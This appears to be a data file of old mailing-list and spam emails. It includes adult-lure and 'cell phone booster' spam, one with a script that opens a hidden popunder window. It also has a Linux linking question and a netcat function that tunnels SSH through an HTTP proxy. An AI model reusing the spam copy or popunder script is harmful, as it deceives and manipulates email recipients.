 zu/nzu/nxu/nxu/nxu/nxu/nxu/e1u/e1u/e1u/e1u/ezu/ezu/ezu/ezu/exu/exu/exu/exu/e
 xufn1ufn1ufn1ufn1ufnzufnzufnzufnzufe1ufe1ufe1ufe1ufe1ufezufezufezufezufexufe
 xufexufexufevefevefevefevefevefWxufWxufWxufWxufWvefWvefWvefWvefWvd7ezt7ezt7e
 zt7ezt7ext7ext7ext7ext7Wzt7Wzt7Wzt7Wzt7Wzt7Wxt7Wxt7Wxt7Wxt7Wvd7Wvd7Wvd7Wvd7W
 vd7Ovd7Ovd7Ovd7Ovd7Otd7Otd7Otd7Otd7OtdbWxtbWxtbWxtbWxtbOxtbOxtbOxtbOxtbOxtbO
 vdbOvdbOvdbOvdbOtdbOtdbOtdbOtdbOtdbGtdbGtdbGtdbGtdbGrdbGrdbGrdbGrc7Gvc7Gvc7G
 vc7Gvc7Gvc7Gtc7Gtc7Gtc7Gtc7Grc7Grc7Grc7Grc69rc69rc69rc69rca9rca9rca9rca9rca9
 pca9pca9pca9pb2tnL2tnL2tnL2tnLWtnLWtnLWtnLWtnLWtnAAAACwAAAAAgACAAAcI/wDxrMFD
 kODANQi3rFG4ReBCgRAPQizoUGAJhCUathBYq1ZFPLUsGdxSokSEjARJDrRYYqNEkSFBWhJ5EKHN
 gw3xNKxFSiQpkDwLeuRpqedPkGtIJdzCNCNKgTmT4lH6sypHpRJXelzTMaalNTNjTl1jsuQWlwgt
 1UqY8SfXjrpExj2Gh2ZEigPXSiVIqpauWseKqu1LSlfhmGvPkiSZcTGdhiulKiW49ujaiIkFKoUp
 U2ZPpAltEqQ50K7CtUNDHhYpsiLCupp/7qSq6+9nn5YCq84tMEKPHiUSMB1OKufUiRUn501KcyZl
 mx1H/4XrHKJH2F/TUq7FMO9ftZbiwv/mKHpr1deW/X7+2ZHudcOWIiToEYHpY4kFub7W63A/wstv
 TRUdWZ6B1JNYrN2l12tFDfWZXx2Fh91z5Wk21nCadbReeA8a6BEpPZAUYn/5+bQSVqIt1xpSfb31
 VQlqjUbZX4YNVdpra7RQmiUtwFQYSLWJdRl5osG0UGYGAbWhgw5OJRJTEUW2Vmuc3TSQW1pJtZUu
 SClUU15w/TVWfxi9Nl5qcEWo1o0LarZmQ8WVMBYphMmFB5fR1XnUXVeOFhl7NZUoVVLMKbVFawu1
 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
 lOrtrqTJxPYZIAACAgA7
 ------=_NextPart_HAubnVEDr9lCVFKk0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free Adult.. No Charges!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_205_23557566705631860586663641
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 **** CELEBRITIES EXPOSED  ****
 Jennifer Love Huitt Gets BareNaked! 
 J-LO Takes Some "Puffy"  
 No Credit Cards, No Checks 
 IT'S FREE!  
 http://www.free-celebhardcore.com/10391
 ------=_NextPart_205_23557566705631860586663641
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!doctype html public "-//w3c//dtd html 4.0 transitional//en"&gt;
 &lt;html&gt;
 &lt;head&gt;
    &lt;meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; U) =
 [Netscape]"&gt;
    &lt;title&gt;ad2&lt;/title&gt;
 &lt;script&gt;
 win=3Dwindow.open("http://www.free-celebhardcore.com/10391")
 win.blur()
 window.focus()
 &lt;/script&gt;
 &lt;/head&gt;
 &lt;body text=3D"#000000" bgcolor=3D"#33CCFF" link=3D"#0000EE" vlink=3D"#551A8B" =
 alink=3D"#FF0000"&gt;
 &lt;center&gt;&lt;table BORDER CELLSPACING=3D0 CELLPADDING=3D0 WIDTH=3D"600" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;center&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font color=3D"#FF0000"&gt;&lt;font =
 size=3D+4&gt;CELEBRITIES
 EXPOSED&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&amp;nbsp;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&amp;nbsp;&lt;font size=3D+3&gt;Jennifer Love Huitt
 Gets BareNaked!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+3&gt;J-LO Takes Some =
 "Puffy"&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&amp;nbsp;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+2&gt;No Credit Cards, No =
 Checks&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+4&gt;IT'S &lt;font =
 color=3D"#FF0000"&gt;FREE!&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+2&gt;&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+3&gt;&lt;a href=3D"http://www.=
 free-celebhardcore.com/10391"&gt;CLICK
 HERE&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+2&gt;&amp;nbsp;&amp;nbsp;=
 &lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+2&gt;&amp;nbsp;=
 &lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;
 &lt;hr WIDTH=3D"600"&gt;
 &lt;br&gt;This email was sent to you by CelebX Mailing Service using verify-send
 technology.&amp;nbsp; Your email address
 &lt;br&gt;is automatically inserted into the To and From headers of this email
 to eliminate undeliverable emails and
 &lt;br&gt;excessive net traffic.&amp;nbsp; If you wish to be removed from this mailing,
 please use our &lt;a href=3D"http://www.lesbianslutbags.com/cgi-bin/remove.=
 cgi"&gt;removal
 link here&lt;/a&gt;&lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_205_23557566705631860586663641--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Thomas wrote :
 &gt; &gt; On Sun, 29 Sep 2002, Thomas Vander Stichele wrote:
 &gt; &gt; 
 &gt; &gt; &gt; INFO (15299: 0)gst_xml_registry_rebuild:1555: Plugin 
 &gt; &gt; &gt; /usr/lib/gst/libgstwincodec.so failed to load: Error loading plugin 
 &gt; &gt; &gt; /usr/lib/gst/libgstwincodec.so, reason: /usr/lib/libaviplay-0.7.so.0:
 &gt; &gt; &gt; 
 &gt; &gt; &gt; undefined symbol: _ZTVN10__cxxabiv120__si_class_type_infoE
 &gt; 
 &gt; &gt; Are you using the same version of GCC to compile the plugin as its C++
 &gt; &gt; dependencies?
 &gt; 
 &gt; Yes, I am.  Everything is built inside a chroot.  I think it isn't
 &gt; linking to a lib somewhere, I'm just not sure what lib it should
 &gt; preloading here.  Anyway to find out which one it is ?
 Looks like a problem with the avifile you've rebuilt... I've been unable to
 recompile successfully the latest version on 8.0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</si>
  <si>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BOOST Your Cell Phone!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;P ALIGN=CENTER&gt;&lt;FONT  SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;B&gt;SAY GOODBYE &lt;BR&gt;
 TO Dropped calls Forever!&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR="#ff0000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;New Technological Breakthrough&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;BR&gt;
  for Cell Phones, Pcs Phones and Cordless Phones!&lt;BR&gt;
 Special Members Only Deal!!&lt;BR&gt;
 &amp;nbsp; &lt;A HREF="http://www.optin.national-adv.com/cellbooster"&gt;They Will Sell Out Fast!!! Click Here Now And end dropped calls FOREVER!&lt;/A&gt; &lt;BR&gt;
 &lt;/B&gt;&lt;/P&gt;&lt;/FONT&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p align="center"&gt;
 &lt;a href="http://optin.national-adv.com/unsubscribe"&gt;CLick Here To Unsubscribe From Our Mailing List&lt;/a&gt;
 &lt;/p&gt;
 qdaaobwe&lt;/HTML&gt;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</si>
  <si>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Re: [ILUG] putty + proxy goodness
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 27, 2002 at 03:06:15PM +0100, Stephen Shirley wrote:
 &gt; Mornin' all,
 &gt; 	I'm running one of the development snapshots of putty, and i just
 &gt; noticed a very handy new feature: builtin proxy support. This means that
 &gt; people like me can connect to external hosts using ssh via a http proxy.
 sort of. Squid, and most other good http proxies won't let you connect
 to any other destination port other than 443 (by default).  So the sshd 
 has to be listening on port 443. PuTTy's proxy support is a bit flaky 
 right now, the raw connects are a bit flaky aswell, I can't get them 
 to work with certain revisions of IOS becuase they use different prompts
 and success strings, gah! I havnt played with the SOCKS proxy support
 much yet, but it's there.
 If you're trying to SSH through a http proxy, use netcat :)
 PuTTy's proxy stuff will take another few weeks to get stable, and
 currently it won't send keepalives, so if you go afk expect your 
 session to get killed by the proxy.  Netcat send keepalives
 which prevent this :)
 # 
 # call as http_proxy_tunnel host port
 #
 function http_proxy_tunnel()
 {
 	mkfifo in.fifo
 	( echo CONNECT $1:$2 HTTP/1.1 
           echo HOST: $1:$2
           echo HTTP/1.1
 	  echo 
           cat in.fifo ) | nc myproxy 3128 | (read ; read ; nc -lp &lt;localport&gt; &gt; in.fifo )
 }
 course that assumes you have bash, I use cygwin, but the above should be
 doable natively, then again if you have cygwin, use OpenSSH and it's
 excellently configurable proxycmd :)
 -- 
 colmmacc@redbrick.dcu.ie        PubKey: colmmacc+pgp@redbrick.dcu.ie  
 Web:                                 http://devnull.redbrick.dcu.ie/ 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 6 Sep 2002, Russell Turpin wrote:
 &gt; You seem not to know what a "poor man's divorce" is.
 I know very little in general. I hope you can excuse me for that.
 &gt; It is an old term, from the time when divorce was
 &gt; difficult, but walking was easy, and identity was
 &gt; not so locked down as it is today. Not every widow
 &gt; had a dead husband.
 Yeah, you could always run away, strangle your wife, your wife could
 always poison you, scooby dooby doo. It wasn't the rule, and I don't feel 
 like desintegrating into a nitpicking orgy. You win.
